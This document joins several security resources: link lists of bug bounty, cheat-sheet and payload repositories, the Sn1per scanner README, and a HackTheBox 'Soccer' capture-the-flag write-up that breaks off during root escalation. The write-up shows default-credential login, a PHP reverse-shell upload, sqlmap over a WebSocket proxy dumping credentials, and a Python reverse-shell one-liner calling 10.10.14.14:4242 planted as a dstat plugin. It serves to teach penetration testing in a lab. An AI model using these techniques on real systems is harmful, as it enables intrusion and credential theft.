https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters https://github.com/m4ll0k/Bug-Bounty-Toolz https://github.com/EdOverflow/bugbounty-cheatsheet https://github.com/KingOfBugbounty/KingOfBugBountyTips https://github.com/EdOverflow/bugbountyguide https://github.com/AlexisAhmed/BugBountyToolkit https://github.com/e11i0t4lders0n/Bugbounty-Resources https://github.com/sushiwushi/bug-bounty-dorks https://github.com/devanshbatham/Awesome-Bugbounty-Writeups https://github.com/1ndianl33t/Bug-Bounty-Roadmaps https://github.com/1ndianl33t/Bugbounty-Resources https://github.com/1ndianl33t/BugBounty_Profile https://github.com/KathanP19/HowToHunt https://github.com/vaib25vicky/awesome-mobile-security https://github.com/Voorivex/pentest-guide https://github.com/Hack-with-Github/Awesome-Hacking https://github.com/1hack0/Facebook-Bug-Bounty-Write-ups https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters https://github.com/0xedward/awesome-infosec https://github.com/victoni/Bug-Bounty-Scripts https://github.com/ujjwal96/arsenal https://github.com/Sambal0x/Recon-tools https://github.com/bobby-lin/bug-bounty-guide https://github.com/vavkamil/awesome-bugbounty-tools https://book.hacktricks.xyz https://github.com/1hack0/Facebook-Bug-Bounty-Write-ups https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters https://github.com/0xedward/awesome-infosec https://github.com/victoni/Bug-Bounty-Scripts https://github.com/ujjwal96/arsenal https://github.com/Sambal0x/Recon-tools https://github.com/bobby-lin/bug-bounty-guide https://github.com/vavkamil/awesome-bugbounty-tools https://book.hacktricks.xyz https://github.com/infoslack/awesome-web-hacking https://github.com/jaredthecoder/awesome-vehicle-security https://github.com/trimstray/the-book-of-secret-knowledge https://github.com/CompassSecurity/Hacking_Tools_Cheat_Sheet https://github.com/The404Hacking/AndroRAT https://github.com/sundaysec/Android-Exploits https://github.com/AzimsTech/Android_Hacking https://github.com/hahwul/MobileHackersWeapons Cheat Sheet collection https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet https://github.com/OlivierLaflamme/Cheatsheet-God https://github.com/baumanab/cheat_sheets https://github.com/detailyang/awesome-cheatsheet https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets https://github.com/coreb1t/awesome-pentest-cheat-sheets https://gist.github.com/jeremypruitt/c435aefa2c2abaec02985d77fb370ec5 https://github.com/PeterSufliarsky/pentesting-cheat-sheet Penetration Testing Checklist collection https://github.com/oxr463/pentesting-checklist https://github.com/netbiosX/Checklists https://github.com/harsh-kk/web-pentesting-checklist https://github.com/chennylmf/OWASP-Web-App-Pentesting-checklists https://github.com/MahdiMashrur/Awesome-Application-Security-Checklist https://github.com/Probely/security_checklist https://github.com/sderosiaux/checklists Pentesters Roadmap collection https://github.com/yeyintminthuhtut/Awesome-Red-Teaming https://github.com/GrandGarcon/Complete_Cybersecurity_Path https://github.com/CSIRT-MU/edu-resources https://github.com/argowang/cyber-security-roadmap https://github.com/Kennyslaboratory/Ultimate-Hacker-Roadmap https://github.com/nairuzabulhul/RoadMap https://github.com/nairuzabulhul/RoadMap/blob/master/PTS/Pentesting.md https://github.com/sundowndev/hacker-roadmap ``` **Payloads Collection** ```java Payloads Collection https://github.com/omurugur/SQL_Injection_Payload https://github.com/omurugur/XSS_Payload_List https://github.com/omurugur/OS_Command_Payload_List https://github.com/omurugur/Open_Redirect_Payload_List https://github.com/cujanovic/SSRF-Testing https://github.com/swisskyrepo/PayloadsAllTheThings https://github.com/akalankauk/XSS-SQL-Master-Payloads https://github.com/austinsonger/payloadsandlists https://github.com/BrodieInfoSec/BIG_XSS https://github.com/pgaijin66/XSS-Payloads https://github.com/sh377c0d3/Payloads https://github.com/omurugur/SQL_Injection_Payload https://github.com/RedVirus0/LFI-Payloads https://github.com/emadshanab/LFI-Payload-List https://github.com/secf00tprint/payloadtester_lfi_rfi https://github.com/foospidy/payloads https://github.com/payloadbox/command-injection-payload-list https://github.com/payloadbox/sql-injection-payload-list https://github.com/payloadbox/open-redirect-payload-list https://github.com/payloadbox/xxe-injection-payload-list https://github.com/payloadbox/rfi-lfi-payload-list https://github.com/payloadbox/csv-injection-payloads https://github.com/terjanq/Tiny-XSS-Payloads https://github.com/hahwul/XSS-Payload-without-Anything ``` **Awesome Electron.js hacking** ```java https://github.com/doyensec/awesome-electronjs-hacking ``` **从别的地方扒来一些案例和知识点** [浅析通过"监控"来辅助进行漏洞挖掘](https://bbs.ichunqiu.com/thread-28591-1-1.html) [威胁情报-生存在SRC平台中的刷钱秘籍](https://bbs.ichunqiu.com/article-921-1.html) [威胁情报](https://mp.weixin.qq.com/s/v2MRx7qs70lpnW9n-mJ7_Q) [YSRC众测之我的漏洞挖掘姿势](https://bbs.ichunqiu.com/article-655-1.html) [SRC的漏洞分析](https://bbs.ichunqiu.com/thread-19745-1-1.html) [众测备忘手册](https://mp.weixin.qq.com/s/4XPG37_lTZDzf60o3W_onA) [挖洞技巧:如何绕过URL限制](https://www.secpulse.com/archives/67064.html) [挖洞技巧:APP手势密码绕过思路总结](https://www.secpulse.com/archives/67070.html) [挖洞技巧:支付漏洞之总结](https://www.secpulse.com/archives/67080.html) [挖洞技巧:绕过短信&邮箱轰炸限制以及后续](http://mp.weixin.qq.com/s/5OSLC2GOeYere9_lT2RwHw) [挖洞技巧:信息泄露之总结](https://www.secpulse.com/archives/67123.html) [OSS对象存储上传解析漏洞](https://xianzhi.aliyun.com/forum/topic/2078) [任意文件下载引发的思考](https://www.secpulse.com/archives/68522.html) [两种密码重置之综合利用](http://www.freebuf.com/articles/network/166520.html) [任意用户密码重置](http://www.freebuf.com/articles/web/166667.html) [通用性业务逻辑组合拳劫持你的权限](https://www.anquanke.com/post/id/106961) **收藏的 src 工具** [Scanners-Box 安全行业从业者自研开源扫描器合辑](https://github.com/We5ter/Scanners-Box) [hakrawler-快速地发现Web应用程序中的端点和资产](https://github.com/hakluke/hakrawler) [Voyager-安全工具集合平台](https://github.com/ody5sey/Voyager) [bayonet-src资产管理系统](https://github.com/CTF-MissFeng/bayonet) [wayback-machine-downloader](https://github.com/hartator/wayback-machine-downloader) [ApkAnalyser-一键提取安卓应用中可能存在的敏感信息](https://github.com/TheKingOfDuck/ApkAnalyser) [Diggy-从apk文件中提取端点](https://github.com/s0md3v/Diggy) **新的一年祝大家挖洞必高危。**
[![Sn1perSecurity](https://sn1persecurity.com/images/Sn1perSecurity-Attack-Surface-Management-header2.png)](https://sn1persecurity.com) [![GitHub release](https://img.shields.io/github/release/1N3/Sn1per.svg)](https://github.com/1N3/Sn1per/releases) [![GitHub issues](https://img.shields.io/github/issues/1N3/Sn1per.svg)](https://github.com/1N3/Sn1per/issues) [![Github Stars](https://img.shields.io/github/stars/1N3/Sn1per.svg?style=social&label=Stars)](https://github.com/1N3/Sn1per/) [![GitHub Followers](https://img.shields.io/github/followers/1N3.svg?style=social&label=Follow)](https://github.com/1N3/Sn1per/) [![Tweet](https://img.shields.io/twitter/url/http/xer0dayz.svg?style=social)](https://twitter.com/intent/tweet?original_referer=https%3A%2F%2Fdeveloper.twitter.com%2Fen%2Fdocs%2Ftwitter-for-websites%2Ftweet-button%2Foverview&ref_src=twsrc%5Etfw&text=Sn1per%20-%20Automated%20Pentest%20Recon%20Scanner&tw_p=tweetbutton&url=https%3A%2F%2Fgithub.com%2F1N3%2FSn1per) [![Follow on Twitter](https://img.shields.io/twitter/follow/xer0dayz.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=xer0dayz) ## ABOUT: Discover the attack surface and prioritize risks with our continuous Attack Surface Management (ASM) platform - Sn1per Professional. For more information, go to https://sn1persecurity.com. [[Website](https://sn1persecurity.com/wordpress/)] [[Blog](https://sn1persecurity.com/wordpress/blog/)] [[Shop](https://sn1persecurity.com/wordpress/shop)] [[Documentation](https://sn1persecurity.com/wordpress/documentation/)] [[Buy Now](https://sn1persecurity.com/wordpress/product/sn1per-professional-v9-0-elite-bundle/)] [[Find Out More](https://sn1persecurity.com/wordpress/sn1per-professional-v9-0-whats-new/)] [![](https://sn1persecurity.com/images/Sn1perSecurity-attack-surface-management-header2.png)](https://sn1persecurity.com/) [![](https://sn1persecurity.com/images/Sn1perSecurity-sn1per3.PNG)](https://sn1persecurity.com/) [![](https://sn1persecurity.com/images/Sn1perSecurity-sn1per-4.PNG)](https://sn1persecurity.com/) [![](https://sn1persecurity.com/images/Sn1perSecurity-sn1per5.PNG)](https://sn1persecurity.com/) ## FEATURES: ### Attack Surface Discovery Easily discover the attack surface (IPs, domain names, open ports, HTTP headers, etc.). ### Penetration Testing Automate the discovery of vulnerabilities and ethical exploitation using the latest hacking and open source security tools. ### Visual Recon Perform visual recon against all hosts in your workspace using the Slideshow widget and thumbnails. ### IT Asset Inventory Search, sort and filter for DNS, IP, title, status, server headers, WAF and open TCP/UDP ports of the entire attack surface inventory. ### Red Team Strengthen "blue team" response and detection capabilities against automated penetration testing techniques. ### Notepad Store and access multiple notes in a single location to help manage your data and keep things organized. ### Vulnerability Management Quickly scan for the latest vulnerabilities and CVEs using the latest commercial and open source vulnerability scanners. ### Web Application Scans Launch web application scans via Burpsuite Professional 2.x, Arachni and Nikto. ### Reporting Export the entire attack surface host list and vulnerability reports to CSV, XLS or PDF format to filter, sort and view all attack surface data. ### OSINT Collection Collect online documents, meta data, email addresses and contact information automatically. ### Continuous Scan Coverage Schedule scans on a daily, weekly or monthly basis for continuous coverage for changes. ### Bug Bounty Automate the discovery of the attack surface and scan for the latest vulnerabilities and CVEs easily. ### Notifications & Changes Receive notifications for scan and host status changes, URL and domain changes and new vulnerabilities discovered. ### Domain Takeovers List all DNS records vulnerable to domain hijacking and takeover. ## KALI/UBUNTU/DEBIAN/PARROT LINUX INSTALL: ``` git clone https://github.com/1N3/Sn1per cd Sn1per bash install.sh ``` ## DOCKER INSTALL: [![](https://sn1persecurity.com/images/docker-logo.png)](https://hub.docker.com/r/sn1persecurity/sn1per) From a new Docker console, run the following commands. ``` Download https://raw.githubusercontent.com/1N3/Sn1per/master/Dockerfile docker build -t sn1per . docker run -it sn1per /bin/bash or docker pull xer0dayz/sn1per docker run -it xer0dayz/sn1per /bin/bash ``` ## USAGE: ``` [*] NORMAL MODE sniper -t <TARGET> [*] NORMAL MODE + OSINT + RECON sniper -t <TARGET> -o -re [*] STEALTH MODE + OSINT + RECON sniper -t <TARGET> -m stealth -o -re [*] DISCOVER MODE sniper -t <CIDR> -m discover -w <WORSPACE_ALIAS> [*] SCAN ONLY SPECIFIC PORT sniper -t <TARGET> -m port -p <portnum> [*] FULLPORTONLY SCAN MODE sniper -t <TARGET> -fp [*] WEB MODE - PORT 80 + 443 ONLY! sniper -t <TARGET> -m web [*] HTTP WEB PORT MODE sniper -t <TARGET> -m webporthttp -p <port> [*] HTTPS WEB PORT MODE sniper -t <TARGET> -m webporthttps -p <port> [*] HTTP WEBSCAN MODE sniper -t <TARGET> -m webscan [*] ENABLE BRUTEFORCE sniper -t <TARGET> -b [*] AIRSTRIKE MODE sniper -f targets.txt -m airstrike [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED sniper -f targets.txt -m nuke -w <WORKSPACE_ALIAS> [*] MASS PORT SCAN MODE sniper -f targets.txt -m massportscan [*] MASS WEB SCAN MODE sniper -f targets.txt -m massweb [*] MASS WEBSCAN SCAN MODE sniper -f targets.txt -m masswebscan [*] MASS VULN SCAN MODE sniper -f targets.txt -m massvulnscan [*] PORT SCAN MODE sniper -t <TARGET> -m port -p <PORT_NUM> [*] LIST WORKSPACES sniper --list [*] DELETE WORKSPACE sniper -w <WORKSPACE_ALIAS> -d [*] DELETE HOST FROM WORKSPACE sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dh [*] GET SNIPER SCAN STATUS sniper --status [*] LOOT REIMPORT FUNCTION sniper -w <WORKSPACE_ALIAS> --reimport [*] LOOT REIMPORTALL FUNCTION sniper -w <WORKSPACE_ALIAS> --reimportall [*] LOOT REIMPORT FUNCTION sniper -w <WORKSPACE_ALIAS> --reload [*] LOOT EXPORT FUNCTION sniper -w <WORKSPACE_ALIAS> --export [*] SCHEDULED SCANS sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly [*] USE A CUSTOM CONFIG sniper -c /path/to/sniper.conf -t <TARGET> -w <WORKSPACE_ALIAS> [*] UPDATE SNIPER sniper -u|--update ``` ## MODES: * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance. * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking. * **FLYOVER:** Fast multi-threaded high level scans of multiple targets (useful for collecting high level data on many hosts quickly). * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning. * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans. * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode. * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML. * **MASSPORTSCAN:** Runs a "fullportonly" scan on mutiple targets specified via the "-f" switch. * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly. * **MASSWEB:** Runs "web" mode scans on multiple targets specified via the "-f" switch. * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port. * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port. * **WEBSCAN:** Launches a full HTTP & HTTPS web application scan against via Burpsuite and Arachni. * **MASSWEBSCAN:** Runs "webscan" mode scans of multiple targets specified via the "-f" switch. * **VULNSCAN:** Launches a OpenVAS vulnerability scan. * **MASSVULNSCAN:** Launches a "vulnscan" mode scans on multiple targets specified via the "-f" switch. ## HELP TOPICS: - [x] Plugins & Tools (https://github.com/1N3/Sn1per/wiki/Plugins-&-Tools) - [x] Scheduled scans (https://github.com/1N3/Sn1per/wiki/Scheduled-Scans) - [x] Sn1per Configuration Options (https://github.com/1N3/Sn1per/wiki/Sn1per-Configuration-Options) - [x] Sn1per Configuration Templates (https://github.com/1N3/Sn1per/wiki/Sn1per-Configuration-Templates) - [x] Sc0pe Templates (https://github.com/1N3/Sn1per/wiki/Sc0pe-Templates) ## INTEGRATION GUIDES: - [x] Github API integration (https://github.com/1N3/Sn1per/wiki/Github-API-Integration) - [x] Burpsuite Professional 2.x integration (https://github.com/1N3/Sn1per/wiki/Burpsuite-Professional-2.x-Integration) - [x] OWASP ZAP integration (https://github.com/1N3/Sn1per/wiki/OWASP-ZAP-Integration) - [x] Shodan API integration (https://github.com/1N3/Sn1per/wiki/Shodan-Integration) - [x] Censys API integration (https://github.com/1N3/Sn1per/wiki/Censys-API-Integration) - [x] Hunter.io API integration (https://github.com/1N3/Sn1per/wiki/Hunter.io-API-Integration) - [x] Metasploit integration (https://github.com/1N3/Sn1per/wiki/Metasploit-Integration) - [x] Nessus integration (https://github.com/1N3/Sn1per/wiki/Nessus-Integration) - [x] OpenVAS API integration (https://github.com/1N3/Sn1per/wiki/OpenVAS-Integration) - [x] Slack API integration (https://github.com/1N3/Sn1per/wiki/Slack-API-Integration) - [x] WPScan API integration (https://github.com/1N3/Sn1per/wiki/WPScan-API-Integration) ## LICENSE: This software is free to distribute and use with the condition that credit is provided to the creator (@xer0dayz @Sn1perSecurity), is not renamed and is not for commercial use or resold and rebranded. Permission to distribute any part of the code for sale is strictly prohibited. ## LEGAL DISCLAIMER: You may not rent or lease, distribute, modify, sell or transfer the software to a third party. Sn1per Community is free for distribution, and modification with the condition that credit is provided to the creator and not used for commercial use. You may not use software for illegal or nefarious purposes. No liability for consequential damages to the maximum extent permitted by all applicable laws. In no event shall Sn1perSecurity or any person be liable for any consequential, reliance, incidental, special, direct or indirect damages whatsoever (including without limitation, damages for loss of business profits, business interruption, loss of business information, personal injury, or any other loss) arising out of or in connection with the use or inability to use this product, even if Sn1perSecurity has been advised of the possibility of such damages. ## COPYRIGHT: The software code and logos are owned by Sn1perSecurity and protected by United States copyright and/or patent laws of international treaty provisions. All rights reserved. ## PURCHASE SN1PER PROFESSIONAL: To obtain a Sn1per Professional license, go to https://sn1persecurity.com. Attack Surface Management (ASM) | Continuous Attack Surface Testing (CAST) | Attack Surface Software | Attack Surface Platform | Continuous Automated Red Teaming (CART) | Vulnerability & Attack Surface Management | Red Team | Threat Intel | Application Security | Cybersecurity | IT Asset Discovery | Automated Penetration Testing | Hacking Tools | Recon Tool | Bug Bounty Tool | Vulnerability Scanner | Attack Surface Analysis | Attack Surface Reduction | Attack Surface Detector | Attack Surface Monitoring | Attack Surface Review | Attack Surface Discovery | Digital Threat Management | Risk Assessment | Threat Remediation | Offensive Security Framework | Automated Penetration Testing Framework | External Threat Management | Internal IT Asset Discovery | Security Orchestration and Automation (SOAR) | Sn1per tutorial | Sn1per tool | Sn1per metasploit | Sn1per for windows | Sn1per review | Sn1per download | how to use Sn1per | Sn1per professional download | Sn1per professional crack | automated pentesting framework | pentest-tools github | ad pentest tools | pentest-tools review | security testing tools | ubuntu pentesting tools | pentesting tools for mac | cloud-based pen-testing tools
**Writeups** This contains the detailed write up on Web applications Penetration Testing, Reports, Disclosure, Bug Hunting, etc Index | [BugBounty Basic -BBb_00 ](/Writeups/BBbasics.md) --- | --- **1** | Linux Distributions **2** | Ethical Alternative for tools **3** | Bug Bounty platforms **4** | Practice platform **5** | How to write a Bug Report? **6** | Ebooks **7** | paid Certifications / courses Index | [BugBounty Let's Hunt - BBh_01 ](/Writeups/BBintermediate.md) --- | --- **1** | [Reports/Disclosures] **2** | [Web security Testing Writeups] **3** | [Pentesting Reports/Disclosures ] **4** | [Web security Testing Writeups] **5** | [Daily Check out] **6** | [Bugbounty Reports/Disclosures ] **7** | [News Sites] **8** | [Tools collection] **9** | [Bugbounty Methodology/Reconnaissance] **10** | [Discussion or HelpDesk] **11** | [Talks - Bug Bounty] **12** | [Pentesting & Bug Hunting Resources - How to Start?] **13** | [Learning Resources] Index | [Bugbounty Hunters - BB_Hunter](/Writeups/BBHunter.md) --- | ---
# Soccer - HackTheBox - Writeup Linux, 20 Base Points, Easy ![info.JPG](images/info.JPG) ## Machine ![‏‏Soccer.JPG](images/Soccer.JPG) ## TL;DR To solve this machine, we begin by enumerating open services using ```namp``` – finding ports ```22```, ```80``` and ```9091```. ***User***: Using `gobuster` we found `/tiny` URL path, Found default credentials for `tiny`, Upload PHP reverse shell using `tiny` portal and we get a reverse shell as `www-data`, Found `nginx` configuration with vhost `soc-player.soccer.htb`, On this vhost we found WebSocket to port `9001`, Found SQLi, Using SQLi we get the credentials of `player` user. ***Root***: Found that `permit nopass player as root cmd /usr/bin/dstat`, Create our `python` reverse shell `dstat` plugin, Run it using `doas` and we get a reverse shell as `root`. ![pwn.JPG](images/pwn.JPG) ## Soccer Solution ### User Let's begin by using `nmap` to scan the target machine: ```console ┌─[evyatar9@parrot]─[/hackthebox/Soccer] └──╼ $ nmap -sV -sC -oA nmap/Soccer 10.10.11.194 Nmap scan report for 10.10.11.194 Host is up (0.081s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 ad:0d:84:a3:fd:cc:98:a4:78:fe:f9:49:15:da:e1:6d (RSA) | 256 df:d6:a3:9f:68:26:9d:fc:7c:6a:0c:29:e9:61:f0:0c (ECDSA) |_ 256 57:97:56:5d:ef:79:3c:2f:cb:db:35:ff:f1:7c:61:5c (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://soccer.htb/ |_http-server-header: nginx/1.18.0 (Ubuntu) 9091/tcp open xmltec-xmlmail? | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix: | HTTP/1.1 400 Bad Request | Connection: close | GetRequest: | HTTP/1.1 404 Not Found | Content-Security-Policy: default-src 'none' | X-Content-Type-Options: nosniff | Content-Type: text/html; charset=utf-8 | Content-Length: 139 | Date: Thu, 05 Jan 2023 20:45:17 GMT | Connection: close | <!DOCTYPE html> | <html lang="en"> | <head> | <meta charset="utf-8"> | <title>Error</title> | </head> | <body> | <pre>Cannot GET /</pre> | </body> | </html> | HTTPOptions, RTSPRequest: | HTTP/1.1 404 Not Found | Content-Security-Policy: default-src 'none' | X-Content-Type-Options: nosniff | Content-Type: text/html; charset=utf-8 | Content-Length: 143 | Date: Thu, 05 Jan 2023 20:45:17 GMT | Connection: close | <!DOCTYPE html> | <html lang="en"> | <head> | <meta charset="utf-8"> | <title>Error</title> | </head> | <body> | <pre>Cannot OPTIONS /</pre> | </body> |_ </html> ``` Observing port `80`, we see that the following web page is hosted: ![port80.JPG](images/port80.JPG) Running gobuster, we find the following path: ```console ┌─[evyatar9@parrot]─[/hackthebox/Soccer] └──╼ $ gobuster dir -u http://soccer.htb -x php -w raft-medium-words.txt -t 100 -k --wildcard -o soccer.gobuster =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://soccer.htb [+] Method: GET [+] Threads: 100 [+] Wordlist: raft-medium-words.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: php [+] Timeout: 10s =============================================================== 2023/01/05 22:49:07 Starting gobuster in directory enumeration mode ===============================================================... /tiny (Status: 301) [Size: 178] [--> http://soccer.htb/tiny/] ... ``` Let's navigate to [http://soccer.htb/tiny](http://soccer.htb/tiny): ![tiny.JPG](images/tiny.JPG) TinyFileManager is a web-based PHP file manager. By reviewing the repository at https://github.com/prasathmani/tinyfilemanager, we see that there are default credentials available: ``` Default username/password: admin/admin@123 and user/12345. ``` We discovered that the credentials admin/admin@123 are valid: ![tinyadmin.JPG](images/tinyadmin.JPG) Let's navigate to tiny/uploads. It appears that we have permission to upload files to this directory, so let's upload the [PHP reverse shell](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php): ![phpshell.JPG](images/phpshell.JPG) Now, we can click the `Direct Link` button to navigate to our reverse shell and obtain a reverse shell: ```console ┌─[evyatar9@parrot]─[/hackthebox/Soccer] └──╼ $ nc -lvp 4242 listening on [any] 4242 ... connect to [10.10.14.14] from soccer.htb [10.10.11.194] 43740 Linux soccer 5.4.0-135-generic #152-Ubuntu SMP Wed Nov 23 20:19:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux 21:33:31 up 1 day, 1:21, 0 users, load average: 0.02, 0.02, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python3 -c 'import pty; pty.spawn("/bin/bash")' www-data@soccer:/$ ``` While enumerating, we found the following `nginx` configuration file: ```console www-data@soccer:/etc/nginx/sites-enabled$ ls ls default soc-player.htb www-data@soccer:/etc/nginx/sites-enabled$ cat soc-player.htb cat soc-player.htb server { listen 80; listen [::]:80; server_name soc-player.soccer.htb; root /root/app/views; location / { proxy_pass http://localhost:3000; proxy_http_version 1.1; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection 'upgrade'; proxy_set_header Host $host; proxy_cache_bypass $http_upgrade; } } ``` In the file, we see a new vhost `soc-player.soccer.htb`. Let's try accessing it at http://soc-player.soccer.htb (make sure to add it to `/etc/hosts` first): ![soc-player.JPG](images/soc-player.JPG) We can now register for an account: ![signup.JPG](images/signup.JPG) After registering, we are presented with the following homepage: ![home.JPG](images/home.JPG) Examining the source code of the webpage, we see that it interacts with `soc-player.soccer.htb:9091` using a WebSocket: ```javascript <script> var ws = new WebSocket("ws://soc-player.soccer.htb:9091"); window.onload = function () { var btn = document.getElementById('btn'); var input = document.getElementById('id'); ws.onopen = function (e) { console.log('connected to the server') } input.addEventListener('keypress', (e) => { keyOne(e) }); function keyOne(e) { e.stopPropagation(); if (e.keyCode === 13) { e.preventDefault(); sendText(); } } function sendText() { var msg = input.value; if (msg.length > 0) { ws.send(JSON.stringify({ "id": msg })) } else append("????????") } } ws.onmessage = function (e) { append(e.data) } function append(msg) { let p = document.querySelector("p"); // let randomColor = '#' + Math.floor(Math.random() * 16777215).toString(16); // p.style.color = randomColor; p.textContent = msg } </script> ``` Using BurpSuite, we can see that the following request was sent to the WebSocket ```json {"id":"95307"} ``` Response: ```json Ticket Exists ``` We can use blind SQL injection on this WebSocket by following the instructions at https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html. This requires setting up a middle `python` server to receive the SQL injection payload from `sqlmap`, send it to the WebSocket, and return the response back to `sqlmap`. To do this, we can use the `python` script provided in the link (remember to update the `ws_server` and `data`): ```python from http.server import SimpleHTTPRequestHandler from socketserver import TCPServer from urllib.parse import unquote, urlparse from websocket import create_connection ws_server = "ws://soc-player.soccer.htb:9091" def send_ws(payload): ws = create_connection(ws_server) # If the server returns a response on connect, use below line #resp = ws.recv() # If server returns something like a token on connect you can find and extract from here # For our case, format the payload in JSON message = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking JSON structure data = '{"id":"%s"}' % message ws.send(data) resp = ws.recv() ws.close() if resp: return resp else: return '' def middleware_server(host_port,content_type="text/plain"): class CustomHandler(SimpleHTTPRequestHandler): def do_GET(self) -> None: self.send_response(200) try: payload = urlparse(self.path).query.split('=',1)[1] except IndexError: payload = False if payload: content = send_ws(payload) else: content = 'No parameters specified!' self.send_header("Content-type", content_type) self.end_headers() self.wfile.write(content.encode()) return class _TCPServer(TCPServer): allow_reuse_address = True httpd = _TCPServer(host_port, CustomHandler) httpd.serve_forever() print("[+] Starting MiddleWare Server") print("[+] Send payloads in http://localhost:8081/?id=*") try: middleware_server(('0.0.0.0',8081)) except KeyboardInterrupt: pass ``` Run it: ```console ┌─[evyatar9@parrot]─[/hackthebox/Soccer] └──╼ $ python3 middle.py [+] Starting MiddleWare Server [+] Send payloads in http://localhost:8081/?id=* ``` Run ```sqlmap```: ```console ┌─[evyatar9@parrot]─[/hackthebox/Soccer] └──╼ $ sqlmap -u "http://localhost:8081/?id=1" --batch --dbs --threads=10 ... available databases [5]: [*] information_schema [*] mysql [*] performance_schema [*] soccer_db [*] sys ``` Let's dump the contents of the `soccer_db` table: ```console ┌─[evyatar9@parrot]─[/hackthebox/Soccer] └──╼ $ sqlmap -u "http://localhost:8081/?id=1" --batch -D soccer_db --dump --threads=10 ... ``` In the `soccer_db` database, we find a table called `accounts`. Let's dump the contents of the accounts table: ```console ┌─[evyatar9@parrot]─[/hackthebox/Soccer] └──╼ $ sqlmap -u "http://localhost:8081/?id=1" --batch -D soccer_db -T accounts --dump --threads=10 ... Database: soccer_db Table: accounts [1 entry] +------+-------------------+----------------------+----------+ | id | email | password | username | +------+-------------------+----------------------+----------+ | 1324 | [email protected] | PlayerOftheMatch2022 | player | +------+-------------------+----------------------+----------+ ``` We obtain the `player` user's password, `PlayerOftheMatch2022`, which we can use to log in via SSH: ```console ┌─[evyatar9@parrot]─[/hackthebox/Soccer] └──╼ $ ssh [email protected] The authenticity of host 'soccer.htb (10.10.11.194)' can't be established. ECDSA key fingerprint is SHA256:Ke/TB8v0VkzfMGP9JasA7Vb22F4d1X6hyU/U5+8JKws. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'soccer.htb,10.10.11.194' (ECDSA) to the list of known hosts. [email protected]'s password: Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-135-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Thu Jan 5 22:22:35 UTC 2023 System load: 0.04 Usage of /: 71.0% of 3.84GB Memory usage: 26% Swap usage: 0% Processes: 232 Users logged in: 0 IPv4 address for eth0: 10.10.11.194 IPv6 address for eth0: dead:beef::250:56ff:feb9:c3f4 0 updates can be applied immediately. The list of available updates is more than a week old. To check for new updates run: sudo apt update Last login: Wed Jan 4 20:15:10 2023 from 10.10.14.6 player@soccer:~$ cat user.txt 57058235a3467e9630f3ef19a5be16bd ``` And we get the user flag ```57058235a3467e9630f3ef19a5be16bd```. ### Root By running ```linpeas``` we get the following information: ```console ... ╔══════════╣ Checking doas.conf permit nopass player as root cmd /usr/bin/dstat ``` ```doas``` (dedicated OpenBSD application sub executor) is a program to execute commands as another user. ```Dstat``` is a versatile replacement for vmstat, iostat and ifstat. Dstat overcomes some of the limitations and adds some extra features [Reference](https://linux.die.net/man/1/dstat). By running `man dstat`, we can see a list of available plugins: ```console player@soccer:~$ man dstat ... FILES Paths that may contain external dstat_*.py plugins: ~/.dstat/ (path of binary)/plugins/ /usr/share/dstat/ /usr/local/share/dstat/ ``` We can write to `/usr/local/share/dstat/`, so let's create a new plugin called `dstat_ps.py` that contains a reverse shell: ```console player@soccer:/usr/local/share/dstat$ ls dstat_ps.py player@soccer:/usr/local/share/dstat$ cat dstat_ps.py import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh") ``` After writing the plugin, we can use `dstat --list` to verify that it is listed among the available plugins: ```console player@soccer:/usr/local/share/dstat$ dstat --list internal: 